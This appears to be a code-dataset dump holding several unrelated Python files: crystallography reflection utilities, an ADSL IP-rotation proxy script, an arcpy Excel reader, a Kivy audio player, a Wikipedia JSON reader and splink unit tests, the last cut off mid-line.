\n \n \"\"\"\n \n # define a function to use function in sginfo, which can generate unique reflections\n libsginfo.hkl_list.argtypes = (ct.c_char_p, ct.c_char_p, ct.c_int, ct.c_int, ct.c_int)\n libsginfo.hkl_list.restype = ct.c_int\n space_group = ct.c_char_p(space_group.encode('utf-8'))\n filename = ct.c_char_p(filename.encode('utf-8'))\n h, k, l = ct.c_int(maxh), ct.c_int(maxk), ct.c_int(maxl)\n return libsginfo.hkl_list(space_group, filename, maxh, maxk, maxl)\n\ndef absent_reflection_filter(space_group, filename, filename_filtered, filename_unique):\n \"\"\"\n function to filter systematically absent reflections in one hkl file, from full reflection hkl list (do not include systematically absent reflections).\n laue_group: laue group name, e.g. 'mmm'.\n\n filename: a string, the name of your hkl file. e.g. \"MFI.hkl\" \n\n filename_filtered: a string, the name of your filtered hkl file. e.g. \"MFI_filtered.hkl\"\n\n filename_unique: a string, the name of generated txt file of unique reflections from sginfo.\n\n Return: a filtered hkl file. \n \"\"\"\n laue_group = laue_c2py(spg2laue(2, space_group))\n full = full_hkl(laue_group, filename_unique)\n data = read_hkl(filename) # read original hkl file \n data_list = [] # store hkl list in hkl file \n filtered_data = [] # store the filtered hkl list and intensity and sigma\n h1, k1, l1, Inte1, Sigma1 = [], [], [], [], []\n for i in range(len(data[0])):\n data_list.append(list((int(data[0][i]), int(data[1][i]), int(data[2][i]))))\n for j in range(len(data_list)):\n if data_list[j] in full: # check whether a specific hkl indic is in unique reflection list\n h1.append(data[0][j])\n k1.append(data[1][j])\n l1.append(data[2][j])\n Inte1.append(data[3][j])\n Sigma1.append(data[4][j])\n if len(h1) == len(k1) == len(l1) == len(Inte1) == len(Sigma1): # make sure the length of all list are same\n filtered_data.append(h1)\n filtered_data.append(k1)\n filtered_data.append(l1)\n filtered_data.append(Inte1)\n filtered_data.append(Sigma1) \n return produce_new_hkl(filtered_data, filename_filtered)\n\ndef full_hkl(laue_group, filename_unique):\n \"\"\"\n function to generate full hkl list (do not include systematically absent reflections) from unique hkl list obtained with sginfo.\n\n laue_group: laue group name, e.g. 'mmm'.\n\n filename_unique: file name of unique hkl list. e.g. 'unique.txt' \n\n Return: list of full hkl list.\n \"\"\"\n unique = np.loadtxt(filename_unique)\n full = []\n for i in range(len(unique)):\n related_reflection = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2]))\n related_reflection = reduce_list(related_reflection) \n full.extend(related_reflection)\n return full\n\ndef dhkl_cal(crystal_system, structure, h, k , l): # 用于计算某一结构对应 hkl 的 d 值。可以满足所有晶系结构的计算\n \"\"\"\n function to calculate d value for a specific hkl indices.\n\n structure: structure object. 
\n\n    Return: d value of hkl indices.\n\n    \"\"\"\n    # structure = dst.loadStructure(cif_name)\n    lattice = structure.lattice\n    a, b, c, alpha, beta, gamma = lattice.a, lattice.b, lattice.c, np.radians(lattice.alpha), np.radians(lattice.beta), np.radians(lattice.gamma) # diffpy stores angles in degrees; np.sin/np.cos expect radians\n    if crystal_system == 'cubic':\n        d_value = a * ((h**2 + k**2 + l**2)**(-0.5))\n    elif crystal_system == 'hexagonal':\n        d_value = a*( ( (4/3)*(h**2 + h*k + k**2) +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n    elif crystal_system == 'tetragonal':\n        d_value = a*( (h**2 + k**2 +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n    elif crystal_system == 'orthorhombic':\n        d_value = (h**2/(a**2) + k**2/(b**2) + l**2/(c**2))**(-0.5)\n    elif crystal_system == 'monoclinic':\n        d_value = (np.sin(beta))*( ((h**2)/(a**2) + (k**2)*( (np.sin(beta))**2 )/(b**2) + (l**2)/(c**2) -2*h*l*(np.cos(beta))/(a*c) )**(-0.5) )\n    elif crystal_system == 'triclinic':\n        va = a*b*c*( (1 - (np.cos(alpha))**2 - (np.cos(beta))**2 -(np.cos(gamma))**2 + 2*(np.cos(alpha))*(np.cos(beta))*(np.cos(gamma)) )**(0.5) )\n        d_value = va*((h**2)*(b**2)*(c**2)*(np.sin(alpha))**2 + (k**2)*(a**2)*(c**2)*(np.sin(beta))**2 + (l**2)*(a**2)*(b**2)*(np.sin(gamma))**2 \\\n        + 2*h*k*(c**2)*a*b*((np.cos(alpha))*(np.cos(beta)) - (np.cos(gamma)) ) + 2*k*l*(a**2)*b*c*((np.cos(beta))*(np.cos(gamma)) - (np.cos(alpha)) )\\\n        + 2*h*l*(b**2)*a*c*((np.cos(alpha))*(np.cos(gamma)) - (np.cos(beta)) ) )**(-0.5)\n    else:\n        print(\"Please input a valid crystal system: 'cubic', 'hexagonal', 'tetragonal', 'orthorhombic', 'monoclinic' or 'triclinic'.\")\n        return \n    return d_value\n\ndef dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, h, k, l): # calculate the d value for given hkl indices from explicit cell parameters; works for all crystal systems\n    \"\"\"\n    function to calculate the d value for specific hkl indices from assigned cell parameters (angles in radians).\n\n    \"\"\"\n    # structure = dst.loadStructure(cif_name)\n    if crystal_system == 'cubic':\n        d_value = a * ((h**2 + k**2 + l**2)**(-0.5))\n    elif crystal_system == 'hexagonal':\n        d_value = a*( ( (4/3)*(h**2 + h*k + k**2) +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n    elif crystal_system == 'tetragonal':\n        d_value = a*( (h**2 + k**2 +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n    elif crystal_system == 'orthorhombic':\n        d_value = (h**2/(a**2) + k**2/(b**2) + l**2/(c**2))**(-0.5)\n    elif crystal_system == 'monoclinic':\n        d_value = (np.sin(beta))*( ((h**2)/(a**2) + (k**2)*( (np.sin(beta))**2 )/(b**2) + (l**2)/(c**2) -2*h*l*(np.cos(beta))/(a*c) )**(-0.5) )\n    elif crystal_system == 'triclinic':\n        va = a*b*c*( (1 - (np.cos(alpha))**2 - (np.cos(beta))**2 -(np.cos(gamma))**2 + 2*(np.cos(alpha))*(np.cos(beta))*(np.cos(gamma)) )**(0.5) )\n        d_value = va*((h**2)*(b**2)*(c**2)*(np.sin(alpha))**2 + (k**2)*(a**2)*(c**2)*(np.sin(beta))**2 + (l**2)*(a**2)*(b**2)*(np.sin(gamma))**2 \\\n        + 2*h*k*(c**2)*a*b*((np.cos(alpha))*(np.cos(beta)) - (np.cos(gamma)) ) + 2*k*l*(a**2)*b*c*((np.cos(beta))*(np.cos(gamma)) - (np.cos(alpha)) )\\\n        + 2*h*l*(b**2)*a*c*((np.cos(alpha))*(np.cos(gamma)) - (np.cos(beta)) ) )**(-0.5)\n    else:\n        print(\"Please input a valid crystal system: 'cubic', 'hexagonal', 'tetragonal', 'orthorhombic', 'monoclinic' or 'triclinic'.\")\n        return \n    return d_value\n\ndef dhkl_cal_single(crystal_system, cif_name, h, k, l):\n    \"\"\"\n    function to calculate the d value for specific hkl indices.\n\n    crystal_system: a string, e.g. 'cubic'. \n\n    cif_name: e.g. 'MFI.cif', you need to put this cif file in this folder. 
\n \"\"\"\n structure = dst.loadStructure(cif_name)\n return dhkl_cal(crystal_system, structure, h, k , l)\n\n\ndef hkl_file_cutoff(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, threshold, filename_new = 'hkl_cutoff.hkl'):\n \"\"\"\n function to cut off a hkl file with specific threshold.\n \"\"\"\n print(\"The resolution of this data is:\", threshold)\n file_origin = read_hkl(filename_hkl)\n h, k, l, Inte, Sigma = [], [], [], [], []\n data = [] \n if len(file_origin[0]):\n for i in range(len(file_origin[0])):\n d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, file_origin[0][i], file_origin[1][i], file_origin[2][i])\n if d_value >= threshold:\n h.append(file_origin[0][i])\n k.append(file_origin[1][i])\n l.append(file_origin[2][i])\n Inte.append(file_origin[3][i])\n Sigma.append(file_origin[4][i])\n if len(h) == len(k) == len(l) == len(Inte) == len(Sigma): # make sure the length of all list are same\n data.append(h)\n data.append(k)\n data.append(l)\n data.append(Inte)\n data.append(Sigma)\n return produce_new_hkl(data, filename_new)\n else: \n print(\"You got a big problem!\")\n pass\n\n\ndef R_int_calculation(space_group, filename_hkl, filename_unique = 'unique.txt', maxh = 30, maxk = 30, maxl = 30):\n \"\"\"\n function to calculate R_int value of a hkl file.\n\n space_group: e.g. 'Pnma'. \n\n filename_hkl: e.g. 'MFI.hkl'.\n\n filename_unique: e.g. 'MFI_unique.txt'\n\n Return: R_int value of this data.\n \n \"\"\"\n data = read_hkl(filename_hkl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n unique = np.loadtxt(filename_unique)\n R_int = []\n for i in range(len(unique)):\n i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) \n i_full = reduce_list(i_full)\n j_temp = [] \n for j in range(len(data[0])):\n if list((int(data[0][j]), int(data[1][j]), int(data[2][j]))) in i_full:\n j_temp.append(j)\n if len(j_temp):\n inte_temp = []\n for k in range(len(j_temp)):\n inte_temp.append(data[3][j_temp[k]]) \n inte_temp = np.array(inte_temp) \n R_int_temp = sum(abs(inte_temp - inte_temp.mean())) / sum(inte_temp) \n R_int.append(R_int_temp) \n if len(R_int):\n R_int = np.array(R_int)\n print(\"The R_int of this data is:\", R_int.mean())\n return R_int.mean()\n else:\n print(\"You got a huge problem!\")\n pass\n\ndef completeness(space_group, crystal_system, a, b, c, alpha, beta, gamma, filename_hkl, threshold = 0.9, filename_unique = 'unique.txt', maxh = 30, maxk = 30, maxl = 30):\n \"\"\"\n Calculate the completeness of your hkl data.\n\n space_group: e.g. 'Pnma'.\n\n crystal_system: e.g. 'orthorhombic'.\n\n a, b, c, alpha, beta, gamma: unit cell parameters.\n\n filename_hkl: string, the name of your hkl file, e.g. 'MFI.hkl'.\n\n threshold: resolution threshold set for this calculation.\n\n filename_unique: sginfo will generate a uniqe hkl list, which will be stored in a txt file. 
\n\n    Return: completeness of your hkl data.\n    \"\"\"\n    data = read_hkl(filename_hkl)\n    laue_group = laue_c2py(spg2laue(2, space_group))\n    gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n    unique = np.loadtxt(filename_unique)\n    def absent_reflection_filter2(laue_group, data, unique):\n        unique_list = []\n        data_list = []\n        for i in range(len(unique)):\n            d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, unique[i][0], unique[i][1], unique[i][2])\n            if d_value >= threshold:\n                unique_list.append(list((unique[i][0], unique[i][1], unique[i][2])))\n                i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) \n                i_full = reduce_list(i_full)\n                for j in range(len(data[0])):\n                    if list((int(data[0][j]), int(data[1][j]), int(data[2][j]))) in i_full:\n                        data_list.append(list((unique[i][0], unique[i][1], unique[i][2])))\n        if len(data_list):\n            data_list = reduce_list(data_list)\n        return unique_list, data_list\n    unique_list, data_list = absent_reflection_filter2(laue_group, data, unique)\n    if len(unique_list) and len(data_list):\n        comp = len(data_list) / len(unique_list)\n        print(\"The completeness of your data is:\", comp)\n        return comp\n    \ndef hkl_file_save(hkl_list, name = 'hkl.txt'): # save hkl list into a .txt file\n    return np.savetxt('%s' % name, hkl_list, fmt=\"%2f\", delimiter=\" \") \n    \n\n    \n\n\n    \n\n", "sub_path": "sayre200531/hkl_merge.py", "file_name": "hkl_merge.py", "file_ext": "py", "file_size_in_byte": 30534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "ctypes.CDLL", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.arcsin", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, 
{"api_name": "matplotlib.pyplot.show", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.square", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 322, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 341, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 359, "usage_type": "call"}, {"api_name": "ctypes.c_int", "line_number": 393, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 393, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 394, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 395, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 396, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 434, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 434, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 435, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 436, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 437, "usage_type": "call"}, {"api_name": "ctypes.c_int", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 487, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 545, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 547, "usage_type": "call"}, {"api_name": "diffpy.structure.loadStructure", "line_number": 561, "usage_type": "call"}, {"api_name": "diffpy.structure", "line_number": 561, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 610, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 623, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 627, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 655, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", 
"line_number": 663, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 678, "usage_type": "call"}]} +{"seq_id": "239399603", "text": "import os\nimport time\nimport requests\nimport netifaces as ni\nfrom lxml import etree\n\n\nflag = True\nwhile flag:\n # try:\n os.popen('adsl-stop')\n print('has stop')\n os.popen('adsl-start')\n print('has start')\n time.sleep(1)\n response = requests.get('https://ip.cn', timeout=3).text\n print('ping pang!!!')\n flag = False\n local_info = etree.HTML(response).xpath('//div[@id=\"result\"]/div/p[2]/code/text()')\n location, carrier = local_info[0].split()\n proxy = etree.HTML(response).xpath('//div[@id=\"result\"]/div/p[1]/code/text()')[0]\n # except Exception as e:\n # print(e)\nelse:\n print(location, carrier, proxy)\n os.popen('service tinyproxy restart')\n print('restart over')\n time.sleep(3)\n print('time.sleep over')\n _id = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']\n print(_id)\n res = requests.get('https://117.50.2.251/update_proxiy?id=%s&location=%s&carrier=%s&proxy=%s' % (_id, location, carrier, proxy), verify=False)\n print(res)\n print(res.text)\n", "sub_path": "change_ip.py", "file_name": "change_ip.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.popen", "line_number": 11, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 19, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 21, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 21, "usage_type": "name"}, {"api_name": "os.popen", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 30, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "139904223", "text": "import pandas as pd\nfrom zipfile import BadZipfile\nfrom arcpy import SetParameterAsText\nfrom SMD_Package.OutputMessage import output_message\nimport sys\n\n\ndef read_input_excel(event_table_path, parameter_index=2):\n \"\"\"\n This function will read the submitted excel file by the SMD user, the file format has to be '.xls' or '.xlsx', if\n any other file format is submitted then this function will return None.\n :param event_table_path: The excel file path.\n :param parameter_index: Parameter index for arcpy output message.\n :return: Pandas DataFrame or NoneType.\n \"\"\"\n file_format = str(event_table_path)[-4:]\n if file_format in ['xls', 'xlsx']:\n\n try:\n df_self_dtype = pd.read_excel(event_table_path)\n s_converter = {col: str for col in list(df_self_dtype)} # Create a string converters for read_excel\n del df_self_dtype\n except IOError: # Handle error if the file path is invalid\n SetParameterAsText(parameter_index, output_message(\"Failed\", \"File tidak ditemukan.\"))\n sys.exit(0)\n except BadZipfile: # Handle corrupt file.\n SetParameterAsText(parameter_index, output_message(\"Failed\", \"File tidak dapat dibaca.\"))\n sys.exit(0)\n\n try:\n df_string = pd.read_excel(event_table_path, 
converters=s_converter) # Convert all columns to 'str' type.\n        except UnicodeEncodeError: # Handle if there is a non-ASCII character.\n            SetParameterAsText(parameter_index, output_message(\"Failed\", \"Terdapat karakter yang tidak bisa diconvert.\"))\n            sys.exit(0)\n\n        df_string.columns = df_string.columns.str.upper() # Uppercase all the column names\n        return df_string # df_string is a DataFrame which contains all data in string format\n    else:\n        SetParameterAsText(parameter_index, output_message(\"Failed\", \"Jenis file harus dalam .xlsx atau .xls\"))\n        sys.exit(0)\n", "sub_path": "SMD_Package/event_table/input_excel.py", "file_name": "input_excel.py", "file_ext": "py", "file_size_in_byte": 1923, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_excel", "line_number": 20, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 24, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "zipfile.BadZipfile", "line_number": 26, "usage_type": "name"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 27, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 31, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 33, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 34, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 39, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "88492514", "text": "from kivy.clock import Clock\nfrom kivy.core.audio import SoundLoader\n\n\nclass Player(object):\n    \"\"\"\n    Base class for audio players that use Kivy SoundLoader.\n    \"\"\"\n\n    def __init__(self):\n        self._volume = 1 # Playback volume, float in the range 0-1.\n        self._prev_volume = 1 # Previous volume before mute.\n        self._sound = None # Sound object.\n        self._pos = 0 # Playback position time (seconds).\n        self._length = 0 # Sound length (seconds).\n        # Run _on_update every second when triggered.\n        self._update_event = Clock.create_trigger(self._on_update, 1, True)\n\n    def set_source(self, source):\n        \"\"\"\n        Set audio source.\n\n        Param source str: URL or path to the sound file.\n        \"\"\"\n        try:\n            self._sound = SoundLoader.load(source)\n            if self._sound:\n                self._sound.bind(on_play=self._on_play)\n                self._sound.bind(on_stop=self._on_stop)\n                self._sound.volume = self._volume\n                self._pos = 0\n                self._length = 0\n            else:\n                self._on_error()\n        except Exception:\n            self._on_error()\n\n    def play(self):\n        \"\"\"\n        Play the current sound.\n        \"\"\"\n        if self._sound:\n            self._sound.play()\n\n    def pause(self):\n        \"\"\"\n        Pause the current sound.\n        \"\"\"\n        if self._sound:\n            self._pos = self._sound.get_pos()\n            try:\n                # Some files can't be resumed properly after being stopped.\n                # Try to pause the sound if possible.\n                self._sound.player.pause()\n                self._sound.state = 'stop'\n            except AttributeError:\n                self._sound.stop()\n            self._update_event.cancel()\n            # Run _on_update.\n            self._on_update(0)\n\n    def 
stop(self):\n \"\"\"\n Stop the current sound.\n \"\"\"\n if self._sound:\n self._sound.stop()\n\n def seek(self, position):\n \"\"\"\n Seek to the given position.\n\n Param position float|int: Position in seconds.\n \"\"\"\n if self._sound:\n if position < self._length:\n # Most sound providers cannot seek when the sound is stopped.\n was_playing = self.is_playing()\n if not was_playing:\n # Avoid updates.\n self._sound.unbind(on_play=self._on_play)\n self._sound.unbind(on_stop=self._on_stop)\n self._sound.play()\n else:\n # Cancel _update_event.\n self._update_event.cancel()\n self._sound.seek(position)\n if not was_playing:\n self.pause()\n # Resume updates.\n self._sound.bind(on_play=self._on_play)\n self._sound.bind(on_stop=self._on_stop)\n # Run _on_update.\n self._on_update(0)\n else:\n # Start _update_event.\n self._update_event()\n elif self._length:\n self.stop()\n self._on_completed()\n\n def get_position(self):\n \"\"\"\n Get the current position of the sound.\n\n Returns float: Position in seconds.\n \"\"\"\n return self._pos\n\n def get_length(self):\n \"\"\"\n Get the length of the current sound.\n\n Returns float: Length of the sound in seconds.\n \"\"\"\n return self._length\n\n def is_ready(self):\n \"\"\"\n Check if the player has a sound loaded.\n\n Returns bool: True if there is a sound loaded.\n \"\"\"\n return bool(self._sound)\n\n def is_playing(self):\n \"\"\"\n Check if the player is playing a sound.\n\n Returns bool: True if there is a sound being played.\n \"\"\"\n return bool(self._sound) and self._sound.state == 'play'\n\n def set_volume(self, volume):\n \"\"\"\n Set the volume of the player.\n\n Param volume float|int: From 0 to 100.\n \"\"\"\n self._volume = volume / 100.\n if self._volume:\n self._prev_volume = self._volume\n if self._sound:\n self._sound.volume = self._volume\n # Run _on_update.\n self._on_update(0)\n\n def _on_play(self, instance):\n \"\"\"\n Called when the player starts playback.\n\n Param instance Sound: The instance of sound triggering this event.\n \"\"\"\n # Run _on_update.\n self._on_update(0)\n # Start _update_event.\n self._update_event()\n\n def _on_stop(self, instance):\n \"\"\"\n Called when the player stops playback.\n\n Param instance Sound: The instance of sound triggering this event.\n \"\"\"\n pos = self._pos\n length = self._length\n self._sound.unload()\n self._sound = None\n self._pos = 0\n self._length = 0\n self._update_event.cancel()\n # Run _on_update.\n self._on_update(0)\n # Playback position time could have been updated for the last time one\n # second before the sound was stopped.\n if length and pos >= length - 1:\n self._on_completed()\n\n def _on_completed(self):\n \"\"\"\n Called when playback is completed.\n \"\"\"\n pass\n\n def _on_error(self):\n \"\"\"\n Called if there was an error loading a sound.\n \"\"\"\n self.stop()\n\n def _on_update(self, dt):\n \"\"\"\n Called every second during playback.\n\n Param dt float.\n \"\"\"\n if self._sound:\n self._pos = self._sound.get_pos()\n # Sometimes the sound length takes a while to get loaded.\n self._length = max(self._length, self._sound.length)\n\n def get_volume(self):\n \"\"\"\n Returns the current volume of the player.\n\n Returns float: Volume value between 0 and 100.\n \"\"\"\n return self._volume * 100\n\n def mute(self):\n \"\"\"\n Mute the player.\n \"\"\"\n self.set_volume(0)\n\n def unmute(self):\n \"\"\"\n Unmute the player.\n \"\"\"\n self.set_volume(self._prev_volume * 100)\n", "sub_path": "audioplayers/player.py", "file_name": "player.py", 
"file_ext": "py", "file_size_in_byte": 6265, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "kivy.clock.Clock.create_trigger", "line_number": 17, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 17, "usage_type": "name"}, {"api_name": "kivy.core.audio.SoundLoader.load", "line_number": 26, "usage_type": "call"}, {"api_name": "kivy.core.audio.SoundLoader", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "613760874", "text": "import json\nimport argparse\n\n\ndef get_country_text(filename, country):\n with open(filename) as f:\n for line in f:\n d = json.loads(line)\n if d['title'] == country:\n return d['text']\n\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', default='./data/jawiki-country.json')\n args = parser.parse_args()\n\n text = get_country_text(args.filename, country='イギリス')\n print(text)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "chapter3/_20.py", "file_name": "_20.py", "file_ext": "py", "file_size_in_byte": 530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "578938451", "text": "import sqlite3\n\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\nimport pytest\n\nfrom splink.gammas import _sql_gen_add_gammas\nfrom splink.settings import sql_gen_case_smnt_strict_equality_2, complete_settings_dict\nfrom splink.expectation_step import _sql_gen_gamma_prob_columns, _sql_gen_expected_match_prob\nfrom splink.params import Params\n\ndef test_probability_columns(sqlite_con_1, gamma_settings_1):\n\n\n params = Params(gamma_settings_1, spark=\"supress_warnings\")\n\n sql = _sql_gen_gamma_prob_columns(params, gamma_settings_1,\"df_gammas1\")\n df = pd.read_sql(sql, sqlite_con_1)\n\n cols_to_keep = [\"prob_gamma_mob_match\", \"prob_gamma_mob_non_match\", \"prob_gamma_surname_match\", \"prob_gamma_surname_non_match\"]\n pd_df_result = df[cols_to_keep][:4]\n\n df_correct = [{\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.7,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.2,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.2,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.1,\n \"prob_gamma_mob_non_match\": 0.8,\n \"prob_gamma_surname_match\": 0.7,\n \"prob_gamma_surname_non_match\": 0.25\n }]\n\n pd_df_correct = pd.DataFrame(df_correct)\n\n assert_frame_equal(pd_df_correct, pd_df_result)\n\ndef test_expected_match_prob(gamma_settings_1, params_1, sqlite_con_1):\n\n df = pd.read_sql(\"select * from df_with_match_probability1\", sqlite_con_1)\n\n\n sql = _sql_gen_expected_match_prob(params_1, gamma_settings_1, \"df_with_gamma_probs1\")\n df = pd.read_sql(sql, sqlite_con_1)\n result_list = list(df[\"match_probability\"])\n\n correct_list = [\n 0.893617021,\n 0.705882353,\n 0.705882353,\n 0.189189189,\n 0.189189189,\n 0.893617021,\n 0.375,\n 0.375]\n\n for i in zip(result_list, correct_list):\n assert i[0] == 